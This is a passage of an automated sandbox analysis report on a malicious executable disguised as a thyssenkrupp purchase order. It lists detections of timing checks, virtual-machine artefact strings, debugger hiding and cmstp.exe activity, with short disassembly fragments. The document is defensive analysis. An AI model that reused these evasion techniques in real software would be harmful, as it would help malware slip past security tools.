      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | RDTSC instruction interceptor: First address: 0000000000568112 second address: 0000000000568112 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F0468D32A96h 0x0000001f popad 0x00000020 call 00007F0468D32516h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | RDTSC instruction interceptor: First address: 0000000000568C4E second address: 0000000000568C4E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 cmp ebx, eax 0x00000006 je 00007F0468D3E1AFh 0x0000000c cmp byte ptr [ebx], FFFFFFB8h 0x0000000f jne 00007F0468D3DF1Bh 0x00000011 pushad 0x00000012 mov ebx, 00000066h 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 00000000029698E4 second address: 00000000029698EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 0000000002969B5E second address: 0000000002969B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F8987 rdtsc 0_2_021F8987
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe TID: 408 | Thread sleep count: 180 > 30
      Source: C:\Windows\explorer.exe TID: 7136 | Thread sleep time: -54000s >= -30000s
      Source: C:\Windows\SysWOW64\cmstp.exe TID: 808 | Thread sleep time: -50000s >= -30000s
      Source: C:\Windows\explorer.exe | Last function: Thread delayed
      Source: C:\Windows\explorer.exe | Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000000.00000002.692728631.00000000021F0000.00000040.00000001.sdmp, Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.757436469.0000000000563000.00000040.00000001.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe8
      Source: explorer.exe, 00000004.00000000.733153621.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000004.00000000.739898951.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000004.00000000.735567164.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000004.00000000.740594811.000000000A839000.00000004.00000001.sdmp | Binary or memory string: #{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&\
      Source: explorer.exe, 00000004.00000000.739898951.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000004.00000000.731025210.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
      Source: explorer.exe, 00000004.00000000.733153621.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: explorer.exe, 00000004.00000000.740094180.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000004.00000000.733153621.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000004.00000000.740094180.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
      Source: explorer.exe, 00000004.00000000.733153621.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Process information queried: ProcessInformation

      Anti Debugging:

      Contains functionality to hide a thread from the debugger
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F0A52 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,021F08C6,00000000,00000000,00000000 0_2_021F0A52
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Process queried: DebugPort
      Source: C:\Windows\SysWOW64\cmstp.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F8987 rdtsc 0_2_021F8987
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F4B8D LdrInitializeThunk, 0_2_021F4B8D
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F8987 mov eax, dword ptr fs:[00000030h] 0_2_021F8987
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F8A17 mov eax, dword ptr fs:[00000030h] 0_2_021F8A17
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F6F79 mov eax, dword ptr fs:[00000030h] 0_2_021F6F79
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F879F mov eax, dword ptr fs:[00000030h] 0_2_021F879F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F2F90 mov eax, dword ptr fs:[00000030h] 0_2_021F2F90
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F2FAD mov eax, dword ptr fs:[00000030h] 0_2_021F2FAD
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F6BFB mov eax, dword ptr fs:[00000030h] 0_2_021F6BFB
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F2FF1 mov eax, dword ptr fs:[00000030h] 0_2_021F2FF1
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F87E9 mov eax, dword ptr fs:[00000030h] 0_2_021F87E9
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F2C1D mov eax, dword ptr fs:[00000030h] 0_2_021F2C1D
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F7C2F mov eax, dword ptr fs:[00000030h] 0_2_021F7C2F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F2468 mov eax, dword ptr fs:[00000030h] 0_2_021F2468
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F8959 mov eax, dword ptr fs:[00000030h] 0_2_021F8959
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F41A1 mov eax, dword ptr fs:[00000030h] 0_2_021F41A1
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E46AE44 mov eax, dword ptr fs:[00000030h] 1_2_1E46AE44
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E46AE44 mov eax, dword ptr fs:[00000030h] 1_2_1E46AE44
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3AE620 mov eax, dword ptr fs:[00000030h] 1_2_1E3AE620
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3DA61C mov eax, dword ptr fs:[00000030h] 1_2_1E3DA61C
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3DA61C mov eax, dword ptr fs:[00000030h] 1_2_1E3DA61C
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3AC600 mov eax, dword ptr fs:[00000030h] 1_2_1E3AC600
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3AC600 mov eax, dword ptr fs:[00000030h] 1_2_1E3AC600
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3AC600 mov eax, dword ptr fs:[00000030h] 1_2_1E3AC600
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3D8E00 mov eax, dword ptr fs:[00000030h] 1_2_1E3D8E00
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E461608 mov eax, dword ptr fs:[00000030h] 1_2_1E461608
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h] 1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h] 1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h] 1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h] 1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h] 1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3B766D mov eax, dword ptr fs:[00000030h] 1_2_1E3B766D
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E45FE3F mov eax, dword ptr fs:[00000030h] 1_2_1E45FE3F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h] 1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h] 1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h] 1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h] 1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h] 1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]